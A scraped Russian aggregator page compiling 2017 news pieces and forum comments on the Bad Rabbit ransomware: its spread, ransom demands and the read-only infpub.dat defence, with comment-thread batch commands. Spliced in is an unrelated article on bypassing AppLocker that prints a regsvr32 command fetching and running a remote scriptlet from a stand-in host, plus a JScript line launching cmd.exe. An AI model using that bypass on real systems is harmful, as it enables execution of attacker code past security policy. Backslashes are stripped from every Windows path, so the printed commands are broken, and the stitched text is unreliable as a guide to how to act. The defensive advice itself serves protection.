24 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Вирус бед рэббит. Шифровальщик Bad Rabbit («Плохой кролик») атакует пользователей из России и Украины. Как защититься от Bad Rabbit

Как защититься от вируса Bad Rabbit

Третья масштабная кибератака за год. На этот раз вирус с новым названием Bad Rabbit и старыми повадками — шифрование данных и вымогание денег за разблокировку. И в зоне поражения по прежнему Россия, Украина и некоторые другие страны СНГ.

Bad Rabbit

Плохой Кролик действует по привычной схеме: присылает фишинговое письмо со вложенным вирусом или ссылкой. В частности, злоумышленники могут представляться техподдержкой Microsoft и попросить срочно открыть вложенный файл или пройти по ссылке. Есть и другой путь распространения — поддельное окно обновления Adobe Flash Player. В обоих случаях Bad Rabbit действует также, как и нашумевший не так давно Wannacry, он шифрует данные жертвы и требует выкуп в размере 0,05 биткойна, что примерно $280 по курсу на 25 октября 2017 года. Жертвами новой эпидемии стали «Интерфакс», питерское издание «Фонтанка», киевский Метрополитен, одесский аэропорт и Министерство культуры Украины. Есть данные, что новый вирус пытался атаковать и несколько известных российских банков, но эта затея провалилась. Эксперты связывают Bad Rabbit с предыдущими крупными атаками, зафиксированными в этом году. Доказательством тому служит схожее ПО шифрования Diskcoder.D, а это тот самый шифровальщик Petya, только слегка видоизмененный.

Как защититься от Bad Rabbit?

Специалисты рекомендуют владельцам Windows компьютеров создать файл «infpub.dat» и поместить его в папку Windows на диске «C». В итоге путь должен выглядеть следующим образом: C:windowsinfpub.dat. Сделать это можно при помощи обычного блокнота, но с правами Администратора. Для этого находим ссылку на программу «Блокнот», кликаем правой кнопкой мышки и выбираем «Запуск от имени Администратора».

Дальше нужно просто сохранить этот файл по адресу C:windows, то есть в папку Windows на диске «C». Название файла: infpub.dat, при этом «dat» это расширение файла. Не забудьте заменить стандартное расширение блокнота «txt» на «dat». После того, как вы сохраните файл, откройте папку Windows, найдите созданный файл infpub.dat, нажмите на него правой кнопкой мыши и выберите пункт «Свойства», где в самом низу нужно поставить галочку «Только чтение». Таким образом даже если вы поймаете вирус Плохого Кролика, он не сможет зашифровать ваши данные.

Превентивные меры

Не забывайте, что оградить себя от любого вируса можно просто соблюдая определенные правила. Прозвучит банально, но никогда не открывайте письма и уже тем более их вложения, если адрес кажется вам подозрительным. Фишинговые письма, то есть маскирующиеся под другие сервисы, наиболее частый способ заражения. Внимательно следите за тем, что вы открываете. Если в письме вложенный файл называется «Важный документ.docx_______.exe» то открывать этот файл точно не следует. Кроме этого нужно иметь резервные копии важных файлов. Например семейный архив с фотографиями или рабочие документы можно продублировать на внешний диск или на облачное хранилище. Не забывайте, как важно использовать лицензионную версию Windows и регулярно устанавливать обновления. Патчи безопасности выпускаются Microsoft регулярно и те, кто их устанавливает не имеют проблем с подобными вирусами.

Вирус Bad Rabbit – как защититься и удалить угрозу

Всем привет! Буквально на днях в России и Украине, Турции, Германии и Болгарии началась масштабная хакерская атака новым вирусом-шифровальщиком Bad Rabbit, он же Diskcoder.D. Шифровальщик на данный момент атакует корпоративные сети больших и средних организаций, блокируя все сети. Сегодня мы расскажем что из себя представляет этот троян и как можно защититься от него.

Что за вирус?

Bad Rabbit (Плохой Кролик) действует по стандартной для шифровальщиков схеме: попадая в систему, он кодирует файлы, за расшифровку которых хакеры требуют 0,05 биткоина, что по курсу составляет 283$ (или 15 700 руб). Об этом сообщается отдельным окном, куда собственно и требуется вводить купленный ключ. Угроза относится к типу троянов Trojan.Win32.Generic, однако в нем присутствуют и другие компоненты, такие как DangerousObject.Multi.Generic и Ransom . Win 32. Gen . ftl.

Bad Rabbit – новый вирус шифровальщик

Полностью отследить все источники заражения пока сложно, но специалисты этим сейчас занимаются. Предположительно угроза попадает на ПК через зараженные сайты, на которых настроено перенаправление, либо под видом фейковых обновлений для популярных плагинов типа Adobe Flash. Список таких сайтов пока только расширяется.

Можно ли удалить вирус и как защититься?

Сразу стоит сказать, в данный момент все антивирусные лаборатории принялись за анализ этого трояна. Если конкретно искать информацию по удалению вируса, то её, как таковой, нет. Отбросим сразу стандартные советы – сделайте бекап системы, точку возврата, удалите такие-то файлы. Если у вас нет сохранений, то все остальное не работает, хакеры такие моменты, в силу спецификации вируса, продумали.

Я думаю, в течении скорого времени будут распространятся сделанные аматорами дешифраторы для Bad Rabbit – вестись на эти программки или нет – ваше личное дело. Как показал прошлый шифровальщик Petya, это мало кому помогает.

А вот предупредить угрозу и удалить её при попытке залезть в ПК можно. Первыми на сообщения о вирусной эпидемии отреагировали лаборатории Kaspersky и ESET, которые уже сейчас блокируют попытки проникновения. Браузер Google Chrome также начал выявлять зараженные ресурсы и предупреждать об их опасности. Вот что нужно сделать для защиты от BadRabbit в первую очередь:

    Если вы используете для защиты Касперский, ESET, Dr.Web, либо другие популярные аналоги, то вам необходимо обязательно выполнить обновление баз данных. Также, для Касперского необходимо включить “Мониторинг активности” (System Watcher), а в ESET примените сигнатуры с обновлением 16295.

Включение Мониторинга активности в Касперском
Если вы не пользуетесь антивирусами, тогда необходимо заблокировать исполнение файлов C:Windowsinfpub.dat и C:Windowscscc.dat. Делается это через редактор групповых политик, либо программку AppLocker для Windows.

Желательно запретить выполнение службы – Windows Management Instrumentation (WMI). В десятке служба называется “Инструментарий управления Windows”. Через правую кнопку войдите в свойства службы и выберите в “Тип запуска” режим “Отключена”.

Отключение службы WMI в Windows 10

  • Обязательно сделайте резервную копию вашей системы. По идее, копия должна всегда храниться на подключаемом носителе. Вот небольшая видео-инструкция по её созданию.
  • Заключение

    В завершении стоит сказать самое главное – не стоит платить выкуп, что бы у вас ни было зашифровано. Такие действия только подстрекают мошенников создавать новые вирусные атаки. Отслеживайте форумы антивирусных компаний, которые, я надеюсь, в скором времени изучат вирус Bad Rabbit и найдут эффективную таблетку. Обязательно выполните вышеописанные пункты по защите вашей ОС. В случае сложностей в их выполнении, отпишитесь в комментариях.

    Защита от Bad Rabbit

    Как известно компьютеры пользователей под управлением Windows атакованы новым вирусом-вымогателем Bad Rabbit, создавшим уже множество проблем на Украине и России.

    Специалисты в области кибербезопасности обнаружили способ защититься от этого вируса Как пишет в своем Telegram-канале компания Group-IB, для этого необходимо создать файл C:windowsinfpub.dat и поставить ему права «только для чтения».

    Эксперты обещают, что в этом случае даже при попадании вредоносного кода на компьютер файлы не будут зашифрованы.

    Group-IB утверждает, что в BadRabbit используется сходный код с вирусом NotPetya, который в июле этого года поразил ряд энергетических, телекоммуникационных и финансовых компаний.

    да кому я нужен

    Читать еще:  Как настроить аваст чтобы не тормозил интернет

    пикабу, вк и порнохаб

    “Верность, доблесть и честь”
    Выпить поспать и поесть.

    Вера, Надежда и Денис

    Браааат! Ну можно еще анидаб, твич, некторые торренты добавить)

    Анимевосторг и анимаунт круче. Анидаб в одно время начал требовать регистрацию и понижать качество

    я уже давно на анимеспирит сижу и анилибрию слушаю, как родные уже. да и чхать мне как-то на точности не точности, главное суть улавливаю. а то сабодрочеры заебли

    Резюмируя, запустит от имени императора эту строку:

    echo .> C:Windowsinfpub.dat && attrib +r C:Windowsinfpub.dat && echo .> C:Windowscscc.dat && attrib +r C:Windowscscc.dat

    Для админов, с помощью psexec можно удалённо сделать тоже самое:

    PsExec \Имя_компа cmd /c “echo .> C:Windowsinfpub.dat && attrib +r C:Windowsinfpub.dat && echo .> C:Windowscscc.dat && attrib +r C:Windowscscc.dat”

    Для тех, кто в танке:

    1) открываем командную строку от имени администратора

    2) вводим cd c:windows

    3) copy con infpub.dat

    4) attrib +r c:windowsinfpub.dat

    5) начинаем чувствовать, как на теле вырастает свитер и борода

    cd c:/windows && copy con infpub.dat && attrib +r c:windowsinfpub.dat

    А вот и оптимизация подъехала .

    Есть смельчаки упростить команду ещё больше?

    Создать текстовый документ правой кнопкой мышки, переименовать его в infpub.dat, через меню свойств дать атрибут “только чтение” и нажать кнопку “применить” слишком сложно?

    Спасибо за eazy road, добра тебе

    только в параметрах папок должна быть убрана галочка с “Скрывать расширения для зарегистрированных типов файлов”

    Не обязательно, просто при сохранении из блокнота, тип расширения указывается “Все файлы”, и в назавнии файла прописывается расширение.

    ++++
    Но это, видимо, проф деформация, хе-хе.

    Да, прикинь? Во первых, в Windows 10 нельзя создать в папке C:Windows ничего, кроме папки. Во вторых, если в ОС отключено отображение расширений файлов, то у тебя получится infpub.dat.txt.

    А вот переместить туда уже созданный файл можно, а при наличии готового файла это было бы намного проще чем открыть командную строку от имени администратора и прописать там пару строчек.

    Во вторых, если в ОС отключено отображение расширений файлов, то у тебя получится infpub.dat.txt.

    Убираем флажок со “Скрывать расширения для зарегистрированных типов файлов” в параметрах папок и всё.

    Да, вот только многие об этом не знают, создадут, например, текстовый документ, который будет отображаться как infpub.dat, а на самом деле будет infpub.dat.txt и перенос его в папку windows никакого результата не даст. Но куда мне тягаться с такими компьютерными экспертами как все кто минусит, впредь буду сидеть молча.

    Не влезая в суть вашего спора, хочу заметить, что для любого пользователя полезно включить отображение расширений файлов, потому что много всяких вредоносных гадостей пользуются именно этим – делают значком файла папку, и пользователь на радостях в неё лезет. А тут папка с расширением .exe заставляет задуматься.

    О да, кликать в нужные места очень сложно. Или ты считаешь что у простого юзера обязательно должна быть умственная отсталость?

    P.S. Я не заявлял что вариант с командной строкой сложнее будет. Я лишь ответил что человек неправ и то что переместить уже готовый файл еще проще.

    Для простого юзера что вызов консоли, что свойства папки – шаманство. Только в случае со свойствами папки, юзеру придется все возвращать обратно, либо удивляться “каким-то файлам”, которые были скрыты, и плакаться, что “ворд не открываиииииит. “, когда сотрут имя файла вместе с расширением. Имхо, разовый вызов консоли будет приятнее, чем такой обход.

    Ну что ты мне тут пытаешься доказать? Те, кого ты описал скорее всё и всех нахуй пошлют, им эта хрень не нужна, а если и будет каким-то невообразимым образом нужна, то они её сами делать не будут т.к. “ниче не знаю, идите нахуй со своей ерундой, обколятся процессорами и ябут друг друга в сокеты”.

    даже создав папку только для чтения файл с таким же названием уже нельзя будет создть.

    ты што наделал, демон? у меня борода отросла

    У меня вырос свитер из бороды, я что-то сделал не так.

    У меня вырос свитер, у него борода, они ушли за вейпом, вернулись на героскутере.

    Ну так всё правильно, труЪ админы вяжут свитер на себе прямо из растущей бороды. Удобно же!

    Спасибо большое, свитер пригодился, но борода не подходит к сиськам, как пофиксить?

    з.ы.: вы же понимаете, что тут без фото не разобраться?

    не боитесь тут щас оголенную Кончиту Вурст словить?

    Сделал, как написано. Проверил файл в папке: галочка “только для чтения” не поставлена. 🙁

    И еще надо было нажать Ctrl+Z => Enter.

    Для незнающих людей:

    3) copy con infpub.dat

    3.1) жмем Ctrl+Z (завершаем запись в созданный текстовый файл)

    А потом уже пишем

    4) attrib +r c:windowsinfpub.dat

    Пока копировал скрипт зашли с военкомата. Выросла борода и флисовая кофта в оливковой расцветке. Видимо военком вызвал конфликт задач.

    А-фигеть. Я ведь 15 минут назад просто проигнорировал разрешение (т.е не разрешил и не запретил) антивирусника на infpub.dat . Почему такие важные новости находятся после 700+ прочитанных постов на пикабу?:

    мля у меня свитер на лице, а волосы по всему телу. я просто не в той последовательности пункты выполнял. расколдуй обратно!

    Вопрос кстати, а если винда на диске “D:” установлена что делать?

    В “D:Windows” все создавать?

    cd %windir% && copy con infpub.dat && attrib +r %windir%infpub.dat

    . и не играем в игры, и не работаем с видео, различными CAD’ами и т.д. Зато бесплатно и безопасно 🙂

    Линукс никому не нужен гугли статистику ОС на пк.

    Доделланый линукс на смартах порвал всех конкурентов.

    Андроидом кличут. + 2 процента на десктопах.

    + 1С клиента для линукса сделала, тоже о чем-то да говорит.

    так что ты не в теме.

    Заебали. В Андроиде ядро линукс, и он не является линукс дистрибутивом. Всем насрать на ваш 1С, в мире ещё куча профессий и сфер деятельности, где нужен софт, который не пишут под линукс, а альтернативы говно. Ты не в теме, просто поехавший линуксоид, давай ещё покукарекай про сервера.

    Я не линуксоид. Всю жизнь на винде. До сих пор на XP сижу.

    Если мозгов нет понять кто с тобой говорит – то иди и помолчи.

    Лучше бы ты линуксоидом был.

    В Андроиде ядро линукс, и он не является линукс дистрибутивом.

    Это официальная позиция гугла, всё остальное придумки фанатиков линукса.

    А фиат в СССР стало жигулями.

    Нужна безопасность – используй freeBSD

    Или работай под DOS.

    Немножко автоматизации: открываем консоль (CMD) от имени администратора (вводим в поиске CMD, кликаем правой кнопкой мыши, выбираем “Запустить от имени администратора”) и пишем следующую комманду:
    echo .> C:Windowsinfpub.dat && attrib +r C:Windowsinfpub.dat

    Готово!
    Кстати, на РБК в статье про Bad Rabbit, “Лаборатория Касперского” советует запретить выполнение еще одного файла: C:Windowscscc.dat

    Прошу знающих людей меня поправить, если я в чем-то неправ.

    закидываем в батник и запускаем от имени администратора

    echo .> C:Windowsinfpub.dat && attrib +r C:Windowsinfpub.dat

    echo .> C:Windowscscc.dat.dat && attrib +r C:Windowscscc.dat.dat

    пауза – для просмотра результатов

    cscc.dat.dat .dat лишняя

    echo .> C:Windowsinfpub.dat && attrib +r C:Windowsinfpub.dat

    echo .> C:Windowscscc.dat && attrib +r C:Windowscscc.dat

    Читать еще:  Контроль учетных записей пользователей (UAC) – что это такое и как отключить

    echo .>%windir%infpub.dat && attrib +r %windir%infpub.dat

    echo .> %windir%cscc.dat && attrib +r %windir%cscc.dat

    Тогда, еще надежнее, создаем например BadRabbit_fix.bat с содержимым :

    echo “BadRabbit Fix v1.0” > %windir%infpub.dat

    ATTRIB +R %windir%infpub.dat

    icacls %windir%infpub.dat /inheritance:r

    echo “BadRabbit Fix v1.0” > %windir%cscc.dat

    ATTRIB +R %windir%cscc.dat

    icacls %windir%cscc.dat /inheritance:r

    тогда он после создания файла и установки атрибутов “только чтение”, удалит все права на этот файл и его даже прочитать никто не сможет

    echo “Petya Fix v1.0” > %windir%perfc

    ATTRIB +R %windir%perfc

    icacls %windir%perfc /inheritance:r

    Создать его можно так же:
    echo .> C:Windowscscc.dat && attrib +r C:Windowscscc.dat
    Правда это не запрет выполнения (там посложнее будет, но можно погуглить). Это работает примерно так: вредоносный скрипт пытается создать свои файлы (infpub.dat и cscc.dat), но, т.к. эти файлы уже существуют, получает от ворот поворот. А так как у файлов атрибут “только для чтения”, скрипт и записать в них ничего не может.
    Спецы, поправьте меня если я не прав.

    Нужно больше автоматизации и дебилизации. Срочно надо создать слабый ИИ чтобы он создал infpub.dat и дал ему атриб РО. И конечно заебашить об этом пост и дать пошаговую инструкцию как писать ИИ чтобы все видели какой ты бородатый.

    Не все знают как создать файл с расширением .dat в системной папке (у большинства отключено отображение расширений файлов). Как по мне, данный способ существенно упрощает задачу.

    в чём проблема создать текстовый файл на рабочем столе, переименовать его в нужный и скопировать после в папку Windows?

    если расширения файлов скрыты, то переименовать не получится.

    С каждой новой массовой вирусной атакой, я всё больше удивляюсь где вы их находите? Что нужно качать, чтоб поймать хоть один вирус? Я несколько лет сижу без антивируса, просто с adguard в браузере

    Петю и WannaCry качать не нужно.

    Когда голимый инет 3г и порты не работали изначально. Ну хоть чемто мой инет лучше)

    На сколько помню, один из этих двоих не может ничего из моего железа заразить, так как у меня wi-fi роутер дома

    Для тех у кого Линукс, но всё равно боится:

    mkdir -p C:/Windows/ && touch C:/Windows/infpub.dat && chmod 0444 C:/Windows/infpub.dat

    Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ

    Windows AppLocker впервые появился в системах Microsoft с релизом Windows Server 2008 R2 и Windows 7. По сути, эта функция позволяет администратору задавать определенные правила для приложений, определяя, что может и чего не может запустить пользователь (или группа пользователей). К примеру, можно запретить запуск на компьютере любых программ, которые не относятся к рабочей деятельности сотрудника.

    Тогда как администраторы привыкли доверять AppLocker, Кейсти Смит пишет, что обойти его ограничения возможно, более того, проделать это весьма легко.

    Фактически Смит предложил использовать не по назначению Regsvr32 и с его помощью скачать из интернета определенный файл. Для этого потребуется команда вида:

    regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

    Исполнение этой команды приведет к скачиваю XML-файла, который приведет к запуску cmd.exe. Кроме того, cmd.exe можно заменить на любую другую программу, и не важно, какие ограничения установлены в AppLocker: программа всё равно успешно запустится.

    Как это работает? Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows. Если разбирать команду Смита: /s в коде обязывает Regsvr32 работать тихо, /n приказывает не использовать DllRegisterServer, /u означает, что мы пытаемся осуществить отмену регистрации, а параметр /i отвечает за ссылку и DLLinstall. В свою очередь, scrobj.dll – это Script Component Runtime.

    Смит обнаружил, что Regsvr32 обработает URL и доставит на машину заданный файл через HTTP или HTTPS. Исследователь добавил немного JavaScript к своему XML-файлу и инициировал его исполнение через запрос на отмену регистрации .DLL. Таким образом, обход AppLocker становится весьма простым трюком, веь любой пользователь может отправить запрос на отмену регистрации.

    «Это не слишком задокументированная [функция], но regsvr32.exe может принять ссылку на скрипт. Чтобы уязвимость сработала, поместите код (VB или JS) внутрь элемента », — пишет Смит.

    Так, в описанном выше примере JavaScript использует ActiveX:

    var r = new ActiveXObject(“WScript.Shell”).Run(“cmd.exe”);

    Атака Смита не требует привилегий администратора, может быть выдана за обычную сессию HTTP, и не должна оставить ни единого следа на жестком диске жертвы, так как не затрагивает реестр и работает непосредственно с памятью. Никаких патчей на данный момент не существует, разве что Regsvr32 можно отрезать от интернета при помощи файервола.

    Исследователь опубликовал на GitHub свой proof-of-concept, который может пригодиться системным администраторам и пентестерам.

    Что за вирус Bad Rabbit и как от него защититься

    Осенняя эпидемия или новый вирус-шифровальщик Bad Rabbit бродит по сетям – мacштaбнaя xaкepcкaя aтaкa началась нa дняx нa тeppитopии Poccии, Укpaины, Tуpции, Гepмaнии, Бoлгapии, Японии и других стран

    Вирус-шифровальщик Bad Rabbit или Diskcoder.D. aтaкуeт кopпopaтивныe ceти бoльшиx и cpeдниx opгaнизaций, блoкиpуя вce ceти.

    Bad Rabbit или “плохой кролик” трудно назвать первопроходцем – ему предшествовали вирусы-шифровальщики Petya и WannaCry.

    Bad Rabbit — что за вирус

    Схему распространения нового вируса исследовали эксперты антивирусной компании ESET и выяснили, что Bad Rabbit проникал на компьютеры жертв под видом обновления Adobe Flash для браузера.

    В антивирусной компании считают, что шифратор Win32/Diskcoder.D, получивший название Bad Rabbit – модифицированная версия Win32/Diskcoder.C, более известного как Petya/NotPetya, который поразил IT-системы организаций в нескольких странах в июне. На связь Bad Rabbit с NotPetya указывают совпадения в коде.

    В атаке используется программа Mimikatz, которая перехватывает на зараженной машине логины и пароли. Также в коде имеются уже прописанные логины и пароли для попыток получения административного доступа.

    В новой вредоносной программе исправлены ошибки в шифровании файлов — код, использованный в вирусе, предназначен для шифрования логических дисков, внешних USB-накопителей и образов CD/DVD, а также загрузочных системных разделов диска. Так, что экспертам по дешифровке придется потратить много времени, чтобы раскрыть секрет вируса Bad Rabbit, утверждают специалисты.

    Новый вирус, как утверждают специалисты, действует пo cтaндapтнoй для шифpoвaльщикoв cxeмe — пoпaдaя в cиcтeму неизвестно откуда, oн кoдиpуeт фaйлы, зa pacшифpoвку кoтopыx xaкepы тpeбуют выкуп в биткоинах.

    Разблокировка одного компьютера обойдется в 0,05 биткоина, что составляет порядка 283 долларов по текущему курсу. В случае выплаты выкупа мошенники вышлют специальный код-ключ, который позволит восстановить нормальную работу системы и не потерять все.

    Если пользователь не переведет средства в течение 48 часов, размер выкупа вырастет.

    Но, стоит помнить, что выплата выкупа – может быть ловушкой, которая не гарантирует разблокировку компьютера.

    В ESET отмечают, что в настоящее время связь вредоносной программы с удаленным сервером отсутствует.

    Вирус больше всего поразил российских пользователей, в меньшей степени — компании в Германии, Турции и на Украине. Распространение происходило через зараженные СМИ. Известные зараженные сайты уже заблокированы.

    В ESET считают, что статистика атак в значительной степени соответствует географическому распределению сайтов, содержащих вредоносный JavaScript.

    Как защититься

    Специалисты компании Group-IB, которая занимается предотвращением и расследованием киберпреступностей, дали рекомендации, как защититься от вируса Bad Rabbit.

    В частности, для защиты от сетевого вредителя нужно создать на своем компьютере файл C:windowsinfpub.dat, при этом в разделе администрирования установить для него права “только для чтения”.

    Читать еще:  Автозагрузка в Windows: Как Добавить/Убрать Программу

    Этим действием исполнение файла будет заблокировано, и все поступающие извне документы не будут зашифрованы даже в том случае, если окажутся зараженными. Нужно создать резервную копию всех ценных данных, чтобы в случае заражения не потерять их.

    Специалисты Group-IB также советуют заблокировать ip-адреса и доменные имена, с которых происходило распространение вредоносных файлов, поставить пользователям блокировку всплывающих окон.

    Рекомендуется также оперативно изолировать компьютеры в системе обнаружения вторжений. Пользователям ПК следует также проверить актуальность и целостность резервных копий ключевых сетевых узлов и обновить операционные системы и системы безопасности.

    “В части парольной политики: настройками групповой политики запретите хранение паролей в LSA Dump в открытом виде. Смените все пароли на сложные”, — добавили в компании.

    Предшественники

    Вирус WannaCry в мае 2017 года распространился не менее чем в 150 странах мира. Он шифровал информацию и требовал заплатить выкуп, по разным данным, от 300 до 600 долларов.

    От него пострадали свыше 200 тысяч пользователей. По одной из версий, его создатели взяли за основу вредоносную программу АНБ США Eternal Blue.

    Глобальная атака вируса-вымогателя Petya 27 июня поразила IT-системы компаний в нескольких странах мира, в большей степени затронув Украину.

    Атаке подверглись компьютеры нефтяных, энергетических, телекоммуникационных, фармацевтических компаний, а также госорганов. Киберполиция Украины заявила, что атака вируса-вымогателя произошла посредством программы “M.E.doc”.

    Материал подготовлен на основе открытых источников

    Плохой кролик: что известно о кибератаке на российские СМИ

    Редакция сайта 360°

    Twitter / @josephfcox

    Кого атаковали

    Днем во вторник стало известно, что «Интерфакс» подвергся мощной хакерской атаке. Об этом сообщил заместитель гендиректора агентства Юрий Погорелый в своем аккаунте в Facebook. «„Интерфакс“ столкнулся с беспрецедентной вирусной атакой. Часть наших сервисов недоступна для клиентов. Наши инженеры восстанавливают их работоспособность», — написал он.

    Позже об атаке сообщило петербургское издание «Фонтанка». «Хакерская атака на наш сервер. У нас серьезные технические проблемы, возможно сайт будет недоступен несколько часов. Будем держать вас в курсе ситуации», — говорится в Telegram-канале сайта.

    Вечером перестали открываться сайты 47news.ru и «Новой газеты» в Санкт-Петербурге , а также сайт Федерального агентства новостей. О причастности к этому вируса Bad Rabbit неизвестно. Позже доступ к 47news.ru был восстановлен.

    Также пострадали государственные учреждения Украины. Атаке подверглись киевское метро, одесский аэропорт и Министерство инфраструктуры.

    Что за вирус

    Пока нет информации, что все перечисленные издания и компании пострадали от одного вируса. Специализирующаяся на киберпреступлениях компании Group-IB заявила, что вирус-шифровальщик Bad Rabbit атаковал три редакции, но не назвала их. По их информации, атаку готовили несколько дней.

    Зафиксирована атака на СМИ вирусом-шифровальщиком . Group-IB стало известно как минимум о трех пострадавших редакциях. Исследуем. #BadRabbitpic.twitter.com/kJ09APag3I

    РБК сообщил, что сотрудники «Интерфакса» выкладывают в соцсети фотографии заблокированных компьютеров. Судя по ним, шифровальщик выводит на экран текст с требованием заплатить выкуп за разблокировку. Сумма выкупа — 0,05 биткоина за каждый компьютер, то есть более 16 тысяч рублей. После получения криптовалюты хакеры обещают дать пароль для снятия блока, пишет издание.

    Глава Group-IB Илья Сачков заявил RNS, что «Интерфакс» и «Фонтанку» атаковал именно шифровальщик. «На данный момент похоже на атаку вирусом-шифровальщиком , в частности в редакциях заблокированы экраны компьютеров», — сказал эксперт. При этом в редакции «Фонтанки» эту информацию опровергли. «У нас совсем другой характер атаки, у нас именно взлом сервера, а не вирус-шифровальщик », — говорится в Telegram-канале издания.

    Большинство пострадавших от вируса находятся в России, аналогичные атаки наблюдаются на Украине, в Турции и Германии, но там их значительно меньше, сообщается в блоге «Лаборатории Касперского». «Все признаки указывают на то, что это целенаправленная атака на корпоративные сети», — пишут специалисты.

    Эксперт по кибербезопасности Алексей Раевский заявился «360», что, судя по первой информации, это «обыкновенный вирус-шифровальщик , который зашифровывает данные на жестком диске компьютера и требует выкуп, чтобы его расшифровать». «О том, как происходит заражение этим вирусом, пока информации не предоставлено. Сейчас проводятся исследования. Я думаю, что в ближайшие несколько часов уже будет известно», — сказал он.

    Поэтому пока нет информации и о том, как защитить свой компьютер от атак.

    Можно озвучить общие рекомендации по защите, которые актуальны всегда и везде. Во-первых , своевременное обновление всего ПО, которое используется в организации, особенно операционных систем. Повышение осведомленности и тренированности персонала в области информационной безопасности, потому что чаще всего заражение происходит из-за неправильных действий персонала организаций, и использование адекватных средств защиты — антивирусных программ, межсетевых экранов и так далее

    Вирус Bad Rabbit: как распространяется, как защититься – описание нового вируса-вымогателя

    Вирус Bad Rabbit – новая угроза для пользователей Интернета и по всему миру. На этот раз, очередной зловред «замахнулся» на российские и украинские банки и крупные организации. Заражение этим «кроликом» чревато – как же защититься от атаки?

    Вирус Bad Rabbit – что из себя представляет?

    «Плохой кролик» – ближайший родственник «Пети» и его «плаксивого» предшественника. Иными словами, Bad Rabbit – модификация вирусов WannaCry и Petya – NotPetya, в частности. Как сообщает компания Group-IB, специализирующаяся на расследовании и предотвращении кибератак, путь у него такой же, как и у NotPetya, то есть цель – Россия и Украина.

    Как распространяется Bad Rabbit?

    Как удалось выяснить редакции «ЮФ», вирус распространяется через фишинговые ссылки в сети Интернет. В частности, в информационном письме, разосланном некоторые организации, было сказано, что вредоносные ссылки для получения конфиденциальных данных маскируются под безобидное всплывающее окно. Притаившийся «кролик» предлагает обновить Adobe Flash Player. При переходе по ссылке пользователь попадает на рекламный сайт, как правило, в новом окне.

    Заражение влечет за собой шифрование всех файлов, а в обмен на расшифровку, по классике, вирус требует оплату в криптовалютах.

    Как защититься от вируса Bad Rabbit?

    Защита от нового вируса несколько иная, нежели от его предшественников. Так как распространяется он по-другому, то и правила будут направлены на защиту от спама и блокирование фишинговых ссылок.

    Рекомендации такие:

    • Как советуют специалисты Group-IB, следует создать файл infpub.dat и разместить его по адресу C:windowsinfpub.dat, а затем поставить права доступа «только для чтения».
    • Тотальное игнорирование подозрительных всплывающих ссылок, как то: «золото даром», «вы выиграли в лотерею» и тому подобное. Игнорирование обновлений неизвестных программ в браузере;
    • Обновление и проверка ПО только на официальном сайте поставщика;
    • Использование AdBlock для своего браузера;
    • Не читайте папку «спам» в электронной почте – если нет уверенности в безопасности письма, конечно/

    Эти мера помогут пользователям без потерь переждать эту атаку. К слову, некоторым организациям повезло меньше – в качестве крайней меры был отключен доступ в Интернет, в частности, к таким мерам прибег крупнейший перевозчик в России.

    Для справки: фишинг, фишинговый сайт, фишинговая ссылка – вид ссылки, содержащей вредоносный код. Маскируется, и зачастую довольно правдоподобно – как обыкновенный Интернет-ресурс ил информационное окно. Фишинг выдает себя запросом паролей и личных данных, чего в норме быть не должно.

    голоса
    Рейтинг статьи
    Ссылка на основную публикацию
    Статьи c упоминанием слов: